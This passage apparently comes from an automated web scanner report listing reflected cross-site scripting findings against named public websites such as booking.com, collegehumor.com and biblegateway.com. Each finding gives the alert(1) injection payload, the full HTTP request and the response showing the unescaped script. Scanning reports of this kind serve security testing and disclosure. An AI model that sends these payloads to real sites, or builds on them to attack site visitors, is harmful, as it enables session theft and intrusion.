6124&r_partnersitename=Beyond.com&t_pgid=446235606103476794&t_sn=/common/error/checkurl.asp&t_httph=www.beyond.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.beyond.com:80/favicon.icoe5463 style=x:expression(alert(1)) fd7a74860e&t_sgid=465502406305451416&t_ws=COLO-WEB01&t_ugid=913263227153426286&f_ip=173.193.214.243&ud=>
...[SNIP]...

6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd89"><script>alert(1)</script>b47e0ff56e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=00ab965157d8537e82c701009fe51263; path=/; domain=.biblegateway.com
Content-Length: 18832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="http://www.biblegateway.com/favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9" />
...[SNIP]...

6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6b8e--><script>alert(1)</script>f5a7c98118a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=1183588a8508212bca1abb89a6cb2a8d; path=/; domain=.biblegateway.com
Content-Length: 18834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="/favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a" />
...[SNIP]...

6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3c8"><script>alert(1)</script>54790336890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f3c8"><script>alert(1)</script>54790336890 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackplanet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Edge-control: no-store
Page-Name: /3f3c8"><script>alert(1)</script>54790336890
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d972bf5ab15e4.37665058; path=/
Cache-Control: no-cache, no-store, private
Content-Type: text/html; charset=utf-8
Content-Length: 77942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<base href="http://www.blackplanet.com/3f3c8"><script>alert(1)</script>54790336890" />
...[SNIP]...

6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f4c'-alert(1)-'19aa576003b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6f4c'-alert(1)-'19aa576003b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=gj6oi7nrchu34cjuu1pvhmt7g1; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
hEngine(
           "http://www.blurtit.com/inc/"+name+".src",
           "http://www.blurtit.com/inc/"+name+"."+ext,
           name,cat);
       
   }
   else{
       errorMsg(name,ext,cat);
   }
}
var currentPage = '/favicon.icob6f4c'-alert(1)-'19aa576003b';
//-->
...[SNIP]...

6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e95"><script>alert(1)</script>0dbcb03d99f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=3fuii4e2ro74fkn0ag29lot583; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="large_modal" script="/zone.php" return="/favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f" resource="">
...[SNIP]...

6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31d83"><script>alert(1)</script>f038581b329 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico31d83"><script>alert(1)</script>f038581b329 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.booking.com
Content-Length: 38617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                                                                                                                               
...[SNIP]...
<meta property="og:url" content="http://www.booking.com/favicon.ico31d83"><script>alert(1)</script>f038581b329" />
...[SNIP]...

6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c2b1<script>alert(1)</script>d7b417a0868 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7c2b1<script>alert(1)</script>d7b417a0868 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%3FN%3D0%26D%3Dx%26Ntt%3D7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026034; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=C8D8B00D722639114CC9D968B79ED1FF.vision1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25260

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"7c2b1<script>alert(1)</script>d7b417a0868"</span>
...[SNIP]...

6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d827'%3balert(1)//f900ae9d4e1 was submitted in the REST URL parameter 1. This input was echoed as 3d827';alert(1)//f900ae9d4e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3d827'%3balert(1)//f900ae9d4e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:45 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: lapg=%2F3d827%27%3FN%3D0%26D%3Dx%26Ntt%3D3d827%27%3Balert%281%29%2F%2Ff900ae9d4e1%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: bzid=1301753025507; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: JSESSIONID=C0D0FFA84BA2B8122526460BFC309C71.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28216

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('3d827';alert(1)//f900ae9d4e1');</script>
...[SNIP]...

6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8110a</title><script>alert(1)</script>09446e4c092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8110a</title><script>alert(1)</script>09446e4c092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%3FN%3D0%26D%3Dx%26Ntt%3D8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026723; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=985D75A4878160C26E5AC58466A0042F.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28575

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;8110a</title><script>alert(1)</script>09446e4c092&#8221;</title>
...[SNIP]...

6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0af"><script>alert(1)</script>e4e99b75a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:06 GMT
Server: Apache
Set-Cookie: lang=en; path=/
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:06 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 9848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Page You Requested Was N
...[SNIP]...
<a href="/favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76/es">
...[SNIP]...

6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13a1d<script>alert(1)</script>c642b5d4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico13a1d<script>alert(1)</script>c642b5d4bda HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 14:09:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1D6D0BAF1D692C9DD311319A3C3F0A3B; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//favicon.ico13a1d<script>alert(1)</script>c642b5d4bda</i>
...[SNIP]...

6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8cf7"><script>alert(1)</script>c187a66e885 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc8cf7"><script>alert(1)</script>c187a66e885 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colbertnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Type: text/html
Content-Length: 24243
Cache-Control: max-age=3593
Date: Sat, 02 Apr 2011 14:19:11 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <he
...[SNIP]...
<link rel="canonical" href="http://www.colbertnation.com/favicon.icoc8cf7"><script>alert(1)</script>c187a66e885" />
...[SNIP]...

6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f7f8"-alert(1)-"6131f1d2df4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1f7f8"-alert(1)-"6131f1d2df4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico1f7f8"-alert(1)-"6131f1d2df4";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico1f7f8"-alert(1
...[SNIP]...

6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 884c7'-alert(1)-'3ff612d36a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico884c7'-alert(1)-'3ff612d36a6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:07 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
)-'3ff612d36a6";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico884c7'-alert(1)-'3ff612d36a6';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvODg0YzcnLWFsZXJ0KDEpLSczZmY2MTJkMzZhNg==';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0;

...[SNIP]...

6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0e55"-alert(1)-"d509def4047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f0e55"-alert(1)-"d509def4047=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:15 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico?f0e55"-alert(1)-"d509def4047=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico?f0e55"-aler
...[SNIP]...

6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1307'-alert(1)-'314d4297df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e1307'-alert(1)-'314d4297df=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:18 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
'314d4297df=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
